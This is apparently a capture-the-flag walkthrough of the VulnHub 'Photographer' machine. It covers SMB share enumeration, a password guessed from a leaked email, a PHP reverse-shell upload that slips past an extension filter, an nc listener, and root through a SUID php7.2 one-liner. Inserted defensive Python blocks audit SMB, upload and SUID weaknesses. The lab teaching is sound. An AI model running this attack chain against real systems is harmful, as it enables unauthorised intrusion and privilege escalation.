Lluna's Pure land.


Photographer

0x00. Official description

This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.

0x01. Information gathering with nmap

From the ping sweep, .1 is the gateway, .254 is the physical host and .129 is Kali, so .135 is the target.

root@JIYE:~/vulnhub/photographer# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-18 06:13 EST
Nmap scan report for 192.168.1.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.1.135
Host is up (0.00018s latency).
MAC Address: 00:0C:29:2D:43:1A (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00017s latency).
MAC Address: 00:50:56:EB:EE:5F (VMware)
Nmap scan report for 192.168.1.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.96 seconds
root@JIYE:~/vulnhub/photographer#

0x02. Port scan

The scan shows ports 80, 139, 8000 and 445 (SMB) open.

root@JIYE:~/vulnhub/photographer# nmap -sC -sV -sT 192.168.1.135 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-18 06:23 EST
Nmap scan report for 192.168.1.135
Host is up (0.0010s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open ssl/http-alt Apache/2.4.18 (Ubuntu)
|_http-generator: Koken 0.22.24
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
MAC Address: 00:0C:29:2D:43:1A (VMware)
Service Info: Host: PHOTOGRAPHER

Host script results:
|_clock-skew: mean: 9h40m00s, deviation: 2h53m12s, median: 7h59m59s
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: photographer
| NetBIOS computer name: PHOTOGRAPHER\x00
| Domain name: \x00
| FQDN: photographer
|_ System time: 2020-12-18T14:23:58-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-18T19:23:57
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.84 seconds
root@JIYE:~/vulnhub/photographer#

0x03. Port 80

Browsing by hand: it is a static page, nothing of interest.

0x04. Port 8000

Browsing by hand: the CMS is Koken, and there is a shell.php whose purpose is unclear.

Looking at the page source, the CMS version is 0.22.24.

0x05. Google for an exploit

Found a file upload exploit. Hmm, the pages crawled earlier had no upload point, so presumably you need to log in to the admin backend to upload.

0x06. Visiting the admin directory (🙃 it actually worked)

Strictly this calls for a directory scan, but admin was guessed, so no need to go into it 🌚.

Tried weak credentials: the username has to be an email address, but the format is unknown, so brute forcing is not an option.

0x07. Inspecting port 445

Port 445 was found open earlier, so enum4linux is used to explore it.

root@JIYE:~# enum4linux -a -o 192.168.1.135
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec 18 06:45:16 2020

==========================
| Target Information |
==========================
Target ........... 192.168.1.135
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=====================================================
| Enumerating Workgroup/Domain on 192.168.1.135 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP

=============================================
| Nbtstat Information for 192.168.1.135 |
=============================================
Looking up status of 192.168.1.135
PHOTOGRAPHER <00> - B <ACTIVE> Workstation Service
PHOTOGRAPHER <03> - B <ACTIVE> Messenger Service
PHOTOGRAPHER <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 192.168.1.135 |
======================================
[+] Server 192.168.1.135 allows sessions using username '', password ''

============================================
| Getting domain SID for 192.168.1.135 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
| OS information on 192.168.1.135 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.135 from smbclient:
[+] Got OS info for 192.168.1.135 from srvinfo:
PHOTOGRAPHER Wk Sv PrQ Unx NT SNT photographer server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03

==============================
| Users on 192.168.1.135 |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

==========================================
| Share Enumeration on 192.168.1.135 |
==========================================

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 192.168.1.135
//192.168.1.135/print$ Mapping: DENIED, Listing: N/A
//192.168.1.135/sambashare Mapping: OK, Listing: OK
//192.168.1.135/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

=====================================================
| Password Policy Information for 192.168.1.135 |
=====================================================


..........(irrelevant output omitted)

==============================================
| Getting printer info for 192.168.1.135 |
==============================================
No printers returned.


enum4linux complete on Fri Dec 18 06:45:30 2020

root@JIYE:~#

The Samba service exposes a share named sambashare:

//192.168.1.135/sambashare Mapping: OK, Listing: OK

Connecting anonymously, there is a backup of a WordPress site and a txt file.

Judging by its name, mailsent.txt is a sent email; its contents:
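The nmap script output in 0x02 and the enum4linux session check above both point at the same two weaknesses: a guest/null session is accepted and SMB signing is disabled (SMB1) or not required (SMB2). The following is an added example, not part of the original post: a small Python parser that pulls those findings out of nmap -sC text so a defender can flag Samba hosts in bulk. The SAMPLE_NMAP text is constructed in the shape of the page's scan, not copied from a live host.

```python
import re

# Constructed sample in the shape of nmap -sC script output for a Samba host
# (not the page's own scan; values chosen to mirror the findings discussed).
SAMPLE_NMAP = """\
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""


def parse_script_output(text):
    """Group nmap '|' script lines under their script name."""
    scripts = {}
    current = None
    for line in text.splitlines():
        header = re.match(r"^\|_?\s*([a-z][a-z0-9-]*):\s*$", line)
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").strip())
        else:
            current = None  # a non-script line ends the current block
    return scripts


def smb_findings(text):
    """Return the SMB weaknesses a defender should fix, in scan order."""
    scripts = parse_script_output(text)
    findings = []
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("account_used: guest"):
            findings.append("guest/null session accepted")
        if line.startswith("message_signing: disabled"):
            findings.append("SMB1 signing disabled")
    for line in scripts.get("smb2-security-mode", []):
        if line.endswith("not required"):
            findings.append("SMB2 signing not required")
    return findings


if __name__ == "__main__":
    for finding in smb_findings(SAMPLE_NMAP):
        print("[!]", finding)
```

On the Samba side the corresponding fixes are to disable guest mapping and require signing; the parser only tells you which hosts still need them.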

Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

The email address is daisa@photographer.com.

The body says: your site is ready now, don't forget your password, my babygirl.

So the guess is that the password is babygirl. Trying it at the login, the guess is correct.

0x08. Upload a file and get a reverse shell

This time the reverse shell that ships with Kali is used (/usr/share/webshells/php/php-reverse-shell.php).

Change the IP to Kali's own address and the port to 6666.

Upload

Only JPG, PNG, GIF and MP4 files are accepted, so first change the file extension.

Upload it

Intercept the request and change the extension back to php.

Listen on Kali

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...


Trigger the reverse shell

Shell obtained

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.1.129] from (UNKNOWN) [192.168.1.135] 56236
Linux photographer 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
15:33:07 up 1:44, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
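The upload filter above only looked at the extension in the client-supplied filename, which is why renaming to .jpg and flipping it back to .php in the proxy got through. As an added example (not code from the post or from Koken), here is a Python validator that decides the stored extension from the file content, rejects image/PHP polyglots, and never reuses the client's name; the signature table and the function names are my own.

```python
import secrets

# Magic-byte signatures for the types the gallery claims to accept
# (JPG, PNG, GIF, MP4); the stored extension is derived from the content.
SIGNATURES = {
    b"\xff\xd8\xff": ".jpg",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
# PHP open tags; a valid image header with PHP appended is still rejected.
PHP_MARKERS = (b"<?php", b"<?=")


def detect_media_type(data: bytes):
    """Return the server-side extension for the payload, or None if not allowed."""
    for sig, ext in SIGNATURES.items():
        if data.startswith(sig):
            return ext
    if len(data) >= 12 and data[4:8] == b"ftyp":  # ISO BMFF / MP4 container
        return ".mp4"
    return None


def safe_upload_name(client_filename: str, data: bytes) -> str:
    """Choose the stored filename from the content alone.

    The client-supplied name (shell.jpg, shell.php, ...) is only used in the
    error message, so rewriting the extension in a proxy changes nothing.
    """
    ext = detect_media_type(data)
    if ext is None:
        raise ValueError(f"{client_filename!r}: not an allowed media type")
    if any(marker in data for marker in PHP_MARKERS):
        raise ValueError(f"{client_filename!r}: embedded PHP source")
    # Random name: no path components, no attacker-chosen characters.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample: a minimal JPEG header followed by zero padding.
    print(safe_upload_name("photo.jpg", b"\xff\xd8\xff\xe0" + bytes(16)))
```

Content checks are one layer; the upload directory should also sit outside the web root or have PHP execution disabled so a file that slips through is served, not run.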

0x09. Privilege escalation

First upgrade the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/$

www-data@photographer:/$

Upgrade to a fully interactive shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/$

www-data@photographer:/$ ^Z
[1]+ 已停止 nc -nvlp 6666
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 6666

www-data@photographer:/$
www-data@photographer:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@photographer:/$

The user.txt flag is in daisa's home directory

www-data@photographer:/home/daisa$ cat user.txt 
d41d8cd98f00b204e9800998ecf8427e
www-data@photographer:/home/daisa$

SUID privilege escalation

find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 2>/dev/null

php7.2 stands out as usable

www-data@photographer:/home/daisa$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
www-data@photographer:/home/daisa$

Privilege escalation reference

Locate the php7.2 binary: it is at /usr/bin/php7.2

www-data@photographer:/$ whereis php7.2
php7: /usr/bin/php7.2 /usr/share/php7.2-mysql /usr/share/php7.2-opcache /usr/share/php7.2-xmlrpc /usr/share/php7.2-json /usr/share/php7.2-readline /usr/share/php7.2-curl /usr/share/php7.2-common /usr/share/php7.2-sqlite3 /usr/share/php7.2-zip /usr/share/php7.2-intl /usr/share/php7.2-xml /usr/share/php7.2-gd /usr/share/php7.2-mbstring
www-data@photographer:/$
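A SUID bit on an interpreter such as /usr/bin/php7.2 is the whole finding here: the listing is otherwise stock Ubuntu. As an added example (not from the post), the Python below turns the manual find review into a check a defender can run from cron: it scans for SUID regular files, diffs them against a baseline, and separately flags any interpreter or shell. The EXPECTED_SUID set is constructed from the page's own listing minus php7.2 and stands in for a baseline taken from a clean reference host.

```python
import os
import re
import stat

# Constructed baseline: the SUID files listed on the page except php7.2.
# On a real host, generate it from a clean reference image instead.
EXPECTED_SUID = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/xorg/Xorg.wrap", "/usr/lib/snapd/snap-confine", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/sbin/pppd", "/usr/bin/pkexec", "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/gpasswd",
    "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn", "/bin/ping", "/bin/fusermount",
    "/bin/mount", "/bin/ping6", "/bin/umount", "/bin/su",
}
# Interpreters and shells that must never be SUID: they run arbitrary code as the owner.
INTERPRETERS = {"php", "python", "perl", "ruby", "node", "bash", "sh", "dash"}


def is_interpreter(path):
    """True for php7.2, python3, bash, sh ... (trailing version suffix stripped)."""
    base = re.sub(r"[0-9.]+$", "", os.path.basename(path))
    return base in INTERPRETERS


def audit_suid(paths, baseline=EXPECTED_SUID):
    """Split a SUID listing into (not in baseline, interpreter) findings."""
    unexpected = sorted(p for p in paths if p not in baseline)
    interpreters = sorted(p for p in paths if is_interpreter(p))
    return unexpected, interpreters


def scan_suid(root="/"):
    """Collect regular files with the SUID bit, like find / -perm -4000 -type f."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


if __name__ == "__main__":
    unexpected, interpreters = audit_suid(scan_suid("/"))
    for path in unexpected:
        print("[!] not in baseline:", path)
    for path in interpreters:
        print("[!] SUID interpreter:", path)
```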

exploit

www-data@photographer:/usr/bin$ ./php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
# # id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
root
# pwd
/usr/bin
# cd /
# cd ~
/bin/sh: 5: cd: can't cd to ~
# cd /root
# ls
proof.txt
# cat proof.txt

Follow me at: http://v1n1v131r4.com
d41d8cd98f00b204e9800998ecf8427e
#
-------------The note is short but the feeling runs long; until next time-------------